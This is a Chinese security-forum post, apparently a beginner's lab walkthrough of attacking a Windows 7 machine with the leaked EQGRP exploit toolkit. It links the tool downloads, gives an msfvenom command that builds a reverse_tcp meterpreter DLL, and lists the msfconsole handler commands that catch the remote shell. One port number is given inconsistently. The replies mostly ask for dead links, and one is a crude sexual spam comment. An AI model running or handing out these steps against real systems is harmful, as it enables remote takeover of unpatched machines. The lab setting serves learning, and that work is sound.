用户
搜索
  • TA的每日心情
    奋斗
    2018-8-6 09:55
  • 签到天数: 6 天

    连续签到: 1 天

    [LV.2]偶尔看看

    i春秋-见习白帽

    Rank: 3Rank: 3

    1

    主题

    66

    帖子

    176

    魔法币
    收听
    1
    粉丝
    1
    注册时间
    2016-5-19
    发表于 2017-12-1 15:50:49 1029481
    本帖最后由 西666 于 2018-10-17 14:30 编辑

    今天逛春秋的时候,偶然看到一个视频,然后居然还提供了实验环境,希望以后多出点这种附带实验环境的视频。
    视频地址:https://www.ichunqiu.com/course/58009?f=1


    本文只介绍利用软件工具去攻击靶机,当然,不喜欢用软件的可以用脚本方式,但是脚本方式貌似对于我们新手有点复杂,不过我还是用脚本成功了,哈哈。。。


    py脚本地址:https://github.com/x0rz/EQGRP_Lost_in_Translation
    脚本打不开是因为需要python2.6 32位相关,依次安装下面二个,然后去path变量加一个python安装路径就OK了。。。
    https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi
    https://nchc.dl.sourceforge.net/project/pywin32/pywin32/Build%20221/pywin32-221.win32-py2.6.exe


    开始正文(开始正文之前请先看下上面那个视频):
    靶机:win7 64位 192.168.20.13

    攻击机:win10 64位 192.168.20.53
    攻击机:kali 192.168.20.232

    1.下载漏洞利用工具,软件版
    链接: https://pan.baidu.com/s/1c4ez0h6 密码: 2ki9


    2.打开软件然后输入想攻击的靶机,然后点击那个按钮,如果出现有Success相关字样就成功了,我这个主要是我已经做过一次实验了。如图
    2.PNG


    3.打开kali,然后用kali下的Metasploit生成后门程序。192.168.20.232为kali的IP,12399监听端口可以自己定义
    操作步骤:打开shell终端。cd到root目录下,然后执行:
    [HTML] 纯文本查看 复制代码
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.232 LPORT=123999 -f dll >win64.dll

    1.PNG



    4.监听后门程序,把下面代码一次性执行完,
    [HTML] 纯文本查看 复制代码
    msfconsole      
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    show options
    set LHOST 192.168.20.232
    set LPORT 12399
    run



    4.把生成的win64.dll复制到你本机上,然后从命名为x64.dll,再复制到漏洞利用工具目录下,提示已经有了,然后覆盖就OK


    5.打开软件的另一个界面,输入下IP,然后其他默认就OK了
    4.PNG


    6.点击上图的按钮,就OK了,然后观察kali这边是不是有反应了。。出现如图就表示成功了。。。。
    5.PNG




    来自一枚萌新的笔记,希望各位大佬轻喷~~~~~~~~







    工具地址能再发一下吗?、失效了
    使用道具 举报 回复
    给,回复拿好……嗳……你这人……别跪啊……一个回复而已……男人膝下有黄金啊……你要干什么啊?嗳!别拉我裤链啊……你这人……你怎么这样?别……啊……啊……嗯……啊嗯……喔……啊……不行……你……听我说……啊……一个……回复……喔……不算什么……啊啊啊……快停下……啊……别……啊啊……要丢了……喔……别吞!脏……快吐出来……卧槽……唉……何必呢?
    使用道具 举报 回复
    发表于 2018-2-7 16:25:47
    感谢分享
    使用道具 举报 回复
    发表于 2018-2-9 17:08:21
    软件地址失效了,能否重新发一下?
    使用道具 举报 回复
    发表于 2018-3-1 16:52:57
    icqc22af9bf 发表于 2018-1-30 15:12
    工具地址能再发一下吗?、失效了

    链接: https://pan.baidu.com/s/1c4ez0h6 密码: 2ki9
    使用道具 举报 回复
    发表于 2018-3-1 16:53:30
    heartk 发表于 2018-2-9 09:08
    软件地址失效了,能否重新发一下?

    抱歉,一直没上来,已经更新帖子了
    使用道具 举报 回复
    发表于 2021-4-16 23:10:18
    帖子失效了 能不能重新发一下 另外2003系统为何不行
    使用道具 举报 回复
    发表于 2021-5-25 10:51:43
    图形化工具可以分享下吗  链接失效了
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册